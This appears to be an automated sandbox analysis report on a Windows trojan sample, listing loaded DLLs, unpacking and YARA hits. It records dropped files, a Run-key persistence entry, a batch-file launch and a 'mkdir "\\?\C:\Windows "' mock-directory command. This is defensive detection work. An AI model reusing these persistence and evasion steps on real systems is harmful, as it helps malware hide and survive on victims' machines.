              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: qDKTsL1y44.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: classification engineClassification label: mal100.troj.evad.winEXE@16/9@4/3
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04203458 GetLastError,FormatMessageA,0_2_04203458
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041E8F58 GetDiskFreeSpaceA,0_2_041E8F58
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FEF94 CoCreateInstance,0_2_041FEF94
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FA27C FindResourceA,LoadResource,SizeofResource,LockResource,0_2_041FA27C
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\Finqiaev.PIFJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
              Source: C:\Users\Public\Libraries\veaiqniF.pifMutant created: \Sessions\1\BaseNamedObjects\HandleMeBaby
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" "
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: qDKTsL1y44.exeReversingLabs: Detection: 71%
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile read: C:\Users\user\Desktop\qDKTsL1y44.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\qDKTsL1y44.exe C:\Users\user\Desktop\qDKTsL1y44.exe
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeProcess created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Finqiaev.PIF "C:\Users\Public\Libraries\Finqiaev.PIF"
              Source: C:\Users\Public\Libraries\Finqiaev.PIFProcess created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Finqiaev.PIF "C:\Users\Public\Libraries\Finqiaev.PIF"
              Source: C:\Users\Public\Libraries\Finqiaev.PIFProcess created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" "Jump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeProcess created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFProcess created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pifJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFProcess created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pifJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: qDKTsL1y44.exeStatic file information: File size 2088448 > 1048576
              Source: qDKTsL1y44.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x177e00
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbH source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\Public\Libraries\veaiqniF.pifUnpacked PE file: 7.2.veaiqniF.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
              Source: C:\Users\Public\Libraries\veaiqniF.pifUnpacked PE file: 10.2.veaiqniF.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
              Source: C:\Users\Public\Libraries\veaiqniF.pifUnpacked PE file: 12.2.veaiqniF.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
              Source: C:\Users\Public\Libraries\veaiqniF.pifUnpacked PE file: 7.2.veaiqniF.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\veaiqniF.pifUnpacked PE file: 10.2.veaiqniF.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\veaiqniF.pifUnpacked PE file: 12.2.veaiqniF.pif.400000.0.unpack
              Source: Yara matchFile source: 0.2.qDKTsL1y44.exe.41e0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1362814847.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: veaiqniF.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_041FFCD8
              Source: initial sampleStatic PE information: section where entry point is pointing to: .....
              Source: netutils.dll.0.drStatic PE information: real checksum: 0x21402 should be: 0x2599d
              Source: qDKTsL1y44.exeStatic PE information: real checksum: 0x0 should be: 0x20c489
              Source: Finqiaev.PIF.0.drStatic PE information: real checksum: 0x0 should be: 0x20c489
              Source: easinvoker.exe.0.drStatic PE information: section name: .imrsiv
              Source: netutils.dll.0.drStatic PE information: section name: .....
              Source: netutils.dll.0.drStatic PE information: section name: .....
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ....
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ....
              Source: netutils.dll.0.drStatic PE information: section name: ....
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: /4
              Source: netutils.dll.0.drStatic PE information: section name: /19
              Source: netutils.dll.0.drStatic PE information: section name: /31
              Source: netutils.dll.0.drStatic PE information: section name: /45
              Source: netutils.dll.0.drStatic PE information: section name: /57
              Source: netutils.dll.0.drStatic PE information: section name: /70
              Source: netutils.dll.0.drStatic PE information: section name: /81
              Source: netutils.dll.0.drStatic PE information: section name: /92
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_042495F8 push 04249685h; ret 0_2_0424967D
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041F4434 push 041F44AAh; ret 0_2_041F44A2
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041F4432 push 041F44AAh; ret 0_2_041F44A2
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0420063B push 0420067Fh; ret 0_2_04200677
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0420063C push 0420067Fh; ret 0_2_04200677
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0423C67C push ecx; mov dword ptr [esp], edx0_2_0423C681
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041E66FC push 041E6757h; ret 0_2_041E674F
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041E66FA push 041E6757h; ret 0_2_041E674F
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0424872C push 0424895Eh; ret 0_2_04248956
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04238770 push 042387CAh; ret 0_2_042387C2
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041F6760 push ecx; mov dword ptr [esp], edx0_2_041F6765
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0420008B push 042000CFh; ret 0_2_042000C7
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0420008C push 042000CFh; ret 0_2_042000C7
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04238128 push 04238154h; ret 0_2_0423814C
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0420AC64 push 0420ACA2h; ret 0_2_0420AC9A
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0420CC74 push 0420CCB7h; ret 0_2_0420CCAF
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041F4DDC push 041F4E29h; ret 0_2_041F4E21
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0420CFA4 push 0420CFD0h; ret 0_2_0420CFC8
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041EE90C push 041EE938h; ret 0_2_041EE930
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04214980 push 042149EBh; ret 0_2_042149E3
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041F69BC push ecx; mov dword ptr [esp], edx0_2_041F69C1
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041F6ADC push ecx; mov dword ptr [esp], edx0_2_041F6AE1
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FEB14 push 041FEBBFh; ret 0_2_041FEBB7
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FEB12 push 041FEBBFh; ret 0_2_041FEBB7
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041F6B20 push ecx; mov dword ptr [esp], edx0_2_041F6B25
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0420D468 push 0420D494h; ret 0_2_0420D48C
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041E3464 push eax; ret 0_2_041E34A0
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FD4D8 push ecx; mov dword ptr [esp], edx0_2_041FD4DA
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041E7511 push 041E7576h; ret 0_2_041E756E
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041E7534 push 041E7576h; ret 0_2_041E756E
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0421B654 push ecx; mov dword ptr [esp], ecx0_2_0421B658

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\veaiqniF.pifJump to dropped file
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\Finqiaev.PIFJump to dropped file
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\truesight.sysJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\veaiqniF.pifJump to dropped file
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\truesight.sysJump to dropped file
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\Finqiaev.PIFJump to dropped file
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FinqiaevJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FinqiaevJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0422224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_0422224C
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0420AEA0 IsIconic,GetWindowPlacement,GetWindowRect,0_2_0420AEA0
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04221018 IsIconic,GetCapture,0_2_04221018
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0423319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_0423319C
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0422FCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,0_2_0422FCD8
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_042338CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,0_2_042338CC
